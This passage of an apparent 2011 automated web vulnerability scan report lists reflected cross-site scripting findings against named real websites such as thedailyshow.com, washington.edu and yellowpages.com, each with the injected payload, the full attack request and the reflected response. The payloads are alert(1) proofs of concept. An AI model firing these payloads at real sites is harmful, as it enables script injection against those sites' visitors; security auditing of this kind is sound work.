<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/favicon.ico4df34"><script>alert(1)</script>277514e1af2"/>
...[SNIP]...

6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailyshow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4544"><script>alert(1)</script>da6a196bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc4544"><script>alert(1)</script>da6a196bf6a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailyshow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Type: text/html;charset=utf-8
Content-Length: 26317
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:49 GMT
Connection: close


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title></title>
       <meta name="description" content=
...[SNIP]...
<link rel="canonical" href="http://www.thedailyshow.com/favicon.icoc4544"><script>alert(1)</script>da6a196bf6a" />
...[SNIP]...

6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c583c"><script>alert(1)</script>086663f75c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoc583c"><script>alert(1)</script>086663f75c8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 14:40:10 GMT
Set-Cookie: mut=173.193.214.243.1301751610082221; path=/; expires=Sat, 30-Apr-11 13:40:10 GMT; domain=.thehollywoodgossip.com
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=kcfer0dro823m5qhqakd4rpij2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.thehollywoodgossip.com/favicon.icoc583c"><script>alert(1)</script>086663f75c8/" />
...[SNIP]...

6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad228"><script>alert(1)</script>abbf960315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoad228"><script>alert(1)</script>abbf960315 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thirdage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Drupal-Cache: MISS
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:41:56 +0000
Cache-Control: public, max-age=600
Set-Cookie: SESSfa98039aa221fd92e5bcd6d7e3f1cdbb=194f49e907f67adbbd4334f28a385153; expires=Mon, 25 Apr 2011 17:15:16 GMT; path=/; domain=.thirdage.com
Vary: Cookie,Accept-Encoding
Web-Head: web09.advomatic.com
Content-Type: text/html; charset=utf-8
Content-Length: 30060
Date: Sat, 02 Apr 2011 13:41:56 GMT
X-Varnish: 635034219
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<form action="/user/login?destination=/favicon.icoad228"><script>alert(1)</script>abbf960315" method="post" id="user-login">
...[SNIP]...

6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8619e"><script>alert(1)</script>1a24f501080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8619e"><script>alert(1)</script>1a24f501080 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomasnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:57 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: _tnetses=4d972bdd7eed3; path=/; domain=.thomasnet.com
Set-Cookie: _usrvst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com
Set-Cookie: am1vst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: am1rm=PP; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com
Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com
Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com
Set-Cookie: referq=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUS=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: us=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: GID=G13017527975219; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tinid=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUID=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<META name="y_key" content="6e6d842e318a7ef3">
<meta name="verify-v1"
...[SNIP]...
<a href="/print/screen/favicon.ico8619e"><script>alert(1)</script>1a24f501080" onClick="dcsExternal('/link.html','TINCATL1=TNET&TINCATL2=CLICK_PRINTSCREEN','www.thomasnet.com');" target="print" rel="nofollow">
...[SNIP]...

6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a87'-alert(1)-'8bb423fecbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico77a87'-alert(1)-'8bb423fecbf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradekey.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:57:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=bfc0f1346d753424ab94cfa33828a2d4; path=/; domain=.tradekey.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21900

<html dir=ltr>
<head>
<title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title>
<link href="http://imgusr.tradekey.com/domains/tradekey.com/t
...[SNIP]...
Date();
   var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear();
   
   if (seconds > 1 || d == "20-01-2011")
       tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/favicon.ico77a87'-alert(1)-'8bb423fecbf', seconds);
}
var old_load_fx = window.onload;
window.onload = function()
{
   track_page_render_time();
   if (old_load_fx)
       old_load_fx();
}
</script>
...[SNIP]...

6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece72'-alert(1)-'ee1533a6222 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoece72'-alert(1)-'ee1533a6222 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21954
Expires: Sat, 02 Apr 2011 13:38:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:51 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ahv4dy55qvwmlcyvaiur4g45; domain=.trails.com; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ils.com',
                   jscdn: 'http://cdn2-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ffavicon.icoece72'-alert(1)-'ee1533a6222',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7550a"><script>alert(1)</script>10b5dcdc5a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelpod.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:11:07 GMT
Server: Apache
Content-language: "
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7980

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> <title>Oh, Ohhh ...</title> <link rel="shortcut icon" href="/favicon.ico"/>
<script type="text/javascript">function L
...[SNIP]...
<a href="http://www.travelpod.ca/favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1">
...[SNIP]...

6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb1'-alert(1)-'18394e848c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /f6eb1'-alert(1)-'18394e848c1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videojug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20692
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: VideoJugUser=YnFn6uAuzgEkAAAAYWEzY2U5ZjgtYzNkYi02MmYxLTFiNTAtZmYwMDA4Y2RiZjU10; expires=Mon, 01-Apr-2013 13:57:58 GMT; path=/; HttpOnly
Set-Cookie: abTest=0; expires=Sat, 30-Apr-2011 13:57:58 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gyrhnaenatluzrnn3li1fr55; path=/; HttpOnly
Set-Cookie: VjPrefEd=cc=US&ed=3; expires=Tue, 02-Apr-2013 13:57:58 GMT; path=/
Set-Cookie: AuthCookie=false; expires=Mon, 04-Apr-2011 13:57:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="m mixFlag big UK" href="/chooseedition?ReturnURL=%2ferror%2ferror404%3faspxerrorpath%3d%252froute.ashx%252ff6eb1'-alert(1)-'18394e848c1&amp;NewEdition=2" >
...[SNIP]...

6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f07"><script>alert(1)</script>33281413b15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f07"><script>alert(1)</script>33281413b15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videosurf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:39:23 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: PHPSESSID=rm91d0sieefthupdu4pqg3oq33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=95; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d97270b593c3; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: luri=L2Zhdmljb24uaWNvODhmMDciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD4zMzI4MTQxM2IxNQ%3D%3D; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta property="og:url" content="http://www.videosurf.com/favicon.ico88f07"><script>alert(1)</script>33281413b15"/>
...[SNIP]...

6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc0cc"><script>alert(1)</script>d118f04eeae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bc0cc"><script>alert(1)</script>d118f04eeae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.walletpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=-%3A%3A-%3A%3A%3A%3A%3A%3A%3A%3A-; expires=Sun, 03-Apr-2011 14:20:26 GMT; path=/
Content-Type: text/html
Content-Length: 34369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/bc0cc"><script>alert(1)</script>d118f04eeae/"/>
...[SNIP]...

6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload caf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 was submitted in the REST URL parameter 1. This input was echoed as caf60<img src=a onerror=alert(1)>2b58733a9f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icocaf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washington.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:19:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1174
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/favicon.icocaf60&lt;img src=a onerror=alert(1)&gt;2b58733a9f9</b> was not found or is no lon
...[SNIP]...
<br>
Reason: File does not exist: /www/world/favicon.icocaf60<img src=a onerror=alert(1)>2b58733a9f9.</br>
...[SNIP]...

6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919c3"><script>alert(1)</script>12d36552cd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico919c3"><script>alert(1)</script>12d36552cd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<body class="favicon_ico919c3"><script>alert(1)</script>12d36552cd5">
...[SNIP]...

6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6c7'-alert(1)-'d930151ee15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6a6c7'-alert(1)-'d930151ee15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8122

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<![CDATA[
var g_pageInfo = { articleUrl: 'favicon.ico6a6c7'-alert(1)-'d930151ee15', editAccess: 574 };
//]]>
...[SNIP]...

6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 was submitted in the REST URL parameter 1. This input was echoed as d0b98<img src=a onerror=alert(1)>861ec7fe5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icod0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yakaz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Yakaz Web Server
Date: Sat, 02 Apr 2011 13:59:51 GMT
Content-Length: 93174
Content-Type: text/html; charset=utf-8
Set-Cookie: il=en; expires=Sun, 01-Apr-2012 13:59:51 GMT; path=/; domain=.yakaz.com
Set-Cookie: YSID=63238dac50279b2939e0c29adb0e3dea; path=/; domain=.yakaz.com
Set-Cookie: infos=deleted; expires=Fri, 02-Apr-2010 13:59:50 GMT; path=/; domain=.yakaz.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:v="urn:schemas-microsoft-co
...[SNIP]...
<h1>Favicon.icod0b98<img Src=a Onerror=alert(1)>861ec7fe5e5</h1>
...[SNIP]...

6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54dd2</script><a>f1938ad83fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /54dd2</script><a>f1938ad83fa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:27 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "efc9b484b7207b82659734d8cfebfe0f"
Cache-Control: no-cache
Set-Cookie: search_terms=script%3E%3Ca%3Ef1938ad83fa; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+jh14baofnio57yzbozczk0ikdipjq%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A26.842806+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A26.842811+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:26 GMT
Set-Cookie: vrid=de53bf40-3f54-012e-53bd-00163ebee541; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:26 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlNGUzNjI4OGEyMDYyYzdkMDlhODhhYjk2Njk3ODhhYjM6E2RleF9zZXNzaW9uX2lkSSIpZGU1NTdmZTAtM2Y1NC0wMTJlLTUzYmUtMDAxNjNlYmVlNTQxBjoGRUY%3D--a614b3974beb8c37155b66aa649d5cc0df7037fd; path=/; HttpOnly
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-ddea1480-3f54-012e-fd15-00163ebee541
Expires: Sat, 02 Apr 2011 12:44:26 GMT
Content-Length: 324385

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
aq.push(['_setAllowAnchor',true]);
_gaq.push(['_setDomainName', ".yellowpages.com"]);
_gaq.push(['_setCustomVar', 1, 'trial_id', "relevancyControl1", 1]);

_gaq.push(['_trackPageview','/54dd2</script><a>f1938ad83fa?gasearch=script%3E%3Ca%3Ef1938ad83fa']);

(function() {
var s, ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = "http://www.goo
...[SNIP]...

6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 was submitted in the REST URL parameter 1. This input was echoed as c496d<img src=a onerror=alert(1)>63985e825a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:41 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 706
